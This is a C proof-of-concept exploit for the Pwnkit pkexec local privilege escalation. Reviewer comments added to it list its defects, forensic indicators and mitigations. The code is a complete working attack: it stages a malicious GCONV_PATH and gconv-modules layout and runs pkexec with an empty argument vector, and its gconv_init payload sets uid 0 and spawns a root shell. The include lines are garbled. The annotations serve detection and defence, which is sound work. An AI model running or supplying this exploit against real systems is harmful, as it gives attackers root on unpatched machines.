/*
 * Proof-of-concept for the "Pwnkit" pkexec local privilege escalation.
 *
 * Reviewed as an artifact: the comments below describe what each step
 * demonstrably does, which defects the code has, and which on-disk and
 * process-level indicators a defender can key on. No logic is changed.
 *
 * Structure: the file is compiled both as the driver (main) and as the
 * shared object that pkexec ends up loading through the glibc iconv
 * (gconv) module mechanism; gconv_init is the payload hook.
 */

/* NOTE(review): the <header> arguments were lost in extraction, so these
 * directives are incomplete as shown. The calls below need at least
 * stdio.h, string.h, stdlib.h, unistd.h, sys/stat.h and sys/wait.h. */
#include #include #include #include #include #include #include #include

/* Places the dynamic loader path in the object's .interp section. The
 * original comment calls this a workaround ("jank"); presumably it lets
 * the same object be linked as both an executable and a shared object —
 * not confirmed here. */
const char service_interp[] __attribute__((section(".interp"))) = "/lib64/ld-linux-x86-64.so.2"; // jank to get this working

/* Writes `string` followed by a newline to stdout.
 * Defect: the first fwrite writes strlen(string) + 1 bytes, i.e. it also
 * emits the terminating NUL byte to stdout. Left as-is. */
void print(const char string[])
{
    fwrite(string, sizeof(char), strlen(string) + 1, stdout);
    fwrite("\n", sizeof(char), strlen("\n"), stdout);
}

/* Empty conversion symbol so the object looks like a gconv module. */
void gconv() {} // gconv thing

/* Payload: glibc calls gconv_init when it loads a gconv module, so this
 * runs inside the process that loaded the object (pkexec, per setup/main).
 *
 * Behaviour as written:
 *   - prints a marker string to stdout,
 *   - calls setuid/seteuid/setgid/setegid(0) with all return values
 *     unchecked, so a failed id change is silently ignored,
 *   - execve's /bin/sh with argv {"sh"} and a minimal PATH-only
 *     environment; if execve fails there is no exit, control simply
 *     returns to the loader.
 *
 * Detection: a /bin/sh child of pkexec running as uid 0 with a
 * near-empty environment, and the "pwned lol !" marker on stdout. */
void gconv_init()
{
    print("pwned lol !");
    setuid(0);
    seteuid(0);
    setgid(0);
    setegid(0);
    char *shellArgv[] = {"sh", NULL};
    char *env[] = { "PATH=/bin:/usr/bin:/sbin:/usr/sbin", NULL };
    execve("/bin/sh", shellArgv, env);
}

/* Creates the on-disk layout in the current working directory.
 * `argv` is accepted but never used.
 *
 * Artifacts created (all relative to the cwd):
 *   GCONV_PATH=./        directory, mode 0775
 *   GCONV_PATH=./pwn     empty file, made executable via fchmod
 *   pwn/                 directory, mode 0775
 *   pwn/pwnkit.so        copied from ./pwnkit.so with system("/bin/cp ...")
 *   pwn/gconv-modules    registers a module named PWNKIT backed by "pwnkit"
 *
 * Defects: neither fopen result is checked, so an unwritable cwd makes
 * fileno(NULL)/fputs(NULL) crash; mkdir/fstat/fchmod/system/fclose
 * results are ignored; system() requires pwnkit.so to already exist in
 * the cwd and shells out for a plain copy.
 *
 * Detection / forensics: a directory literally named "GCONV_PATH=."
 * beside a "pwn" directory holding a gconv-modules file is a strong
 * indicator this tool was run, even if the later cleanup partly
 * succeeded. */
void setup(char *argv[])
{
    mkdir("GCONV_PATH=.", S_IRWXU | S_IRWXG | S_IROTH | S_IXOTH);
    mkdir("pwn", S_IRWXU | S_IRWXG | S_IROTH | S_IXOTH);
    FILE *fp = fopen("GCONV_PATH=./pwn", "w");
    struct stat buf;
    fstat(fileno(fp), &buf);
    // Mark the marker file executable for user, group and other.
    fchmod(fileno(fp), buf.st_mode | S_IXUSR | S_IXGRP | S_IXOTH );
    fclose(fp);
    // Shells out to copy the payload object into place (unchecked).
    system("/bin/cp pwnkit.so pwn/pwnkit.so"); // author left this as a shortcut
    fp = fopen("pwn/gconv-modules", "w");
    // Module table: charset name PWNKIT maps to library basename "pwnkit"
    // (pwn/pwnkit.so); "2" is the cost field. Matches CHARSET=pwnkit in main.
    char *gconv = "module PWNKIT// INTERNAL pwnkit 2\n"
                  "module INTERNAL PWNKIT// pwnkit 2";
    fputs(gconv, fp);
    fclose(fp);
}

/* Removes the artifacts created by setup(), files before their
 * directories. Every return value is ignored, so any failure leaves
 * residue behind — which is also why partial leftovers of these exact
 * names are useful forensic evidence of an attempted run. */
void clean()
{
    remove("GCONV_PATH=./pwn");
    rmdir("GCONV_PATH=.");
    remove("pwn/pwnkit.so");
    remove("pwn/gconv-modules");
    rmdir("pwn");
}

/* Forks; the child execve's /usr/bin/pkexec with the caller-supplied
 * argv/envp, the parent waits and then cleans up.
 *
 * Defects:
 *   - fork() == -1 is not handled; the else branch then calls
 *     waitpid(-1, ...) and waits for any child.
 *   - In the child, a failed execve has no _exit(), so the child returns
 *     into main and runs the trailing _exit(0) there.
 *   - WEXITSTATUS is read without WIFEXITED; if pkexec was killed by a
 *     signal the 127/1 comparison is meaningless.
 *   - The "most likely patched" message is a heuristic: exit status 127
 *     (exec failure) or 1 is presumably what a fixed pkexec returns when
 *     it rejects the call — inferred, not verified here.
 *
 * Detection: pkexec spawned with an empty argument vector (see main). */
void runAndClean(char * const env[], char * const arg[])
{
    int pid = fork();
    if (pid == 0) {
        execve("/usr/bin/pkexec", arg, env);
    } else {
        int status;
        waitpid(pid, &status, 0);
        if (WEXITSTATUS(status) == 127 || WEXITSTATUS(status) == 1) {
            print("[Pwnkit] Failed to execute pkexec, or it returned an error; your system is most likely patched!");
        }
        print("[Pwnkit] Cleaning up..");
        clean();
    }
}

/* Driver. Builds the directory layout, then runs pkexec with:
 *   argv = { NULL }   — an empty argument vector (argc == 0), which is
 *                       the condition the vulnerable pkexec mishandles;
 *   envp = the crafted list below, where "PATH=GCONV_PATH=." and
 *          "CHARSET=pwnkit" point the iconv loader at pwn/gconv-modules
 *          and the PWNKIT module from setup(). "SHELL=pwn" and
 *          "GIO_USE_VFS=" presumably steer pkexec into the code path that
 *          performs the charset conversion — not re-derived here.
 *
 * Note: `env`/`args` are const char *[] but runAndClean takes
 * char *const [], so this compiles only with a type warning.
 *
 * Mitigation: patched polkit rejects an empty argv in pkexec; an interim
 * hardening is removing the setuid bit from /usr/bin/pkexec. Detection:
 * pkexec executed with argc 0 and/or a GCONV_PATH-bearing environment. */
int main(int argc, char *argv[])
{
    print("[Pwnkit] Setting up directory structure..");
    setup(argv);
    print("[Pwnkit] Setting up environment variables..");
    const char *env[] = { "pwn", "PATH=GCONV_PATH=.", "CHARSET=pwnkit", "SHELL=pwn", "GIO_USE_VFS=", NULL };
    const char *args[] = { NULL };
    print("[Pwnkit] Pwning pkexec..");
    runAndClean(env, args);
    // Reached by the parent after cleanup, and by the child if execve failed.
    _exit(0);
}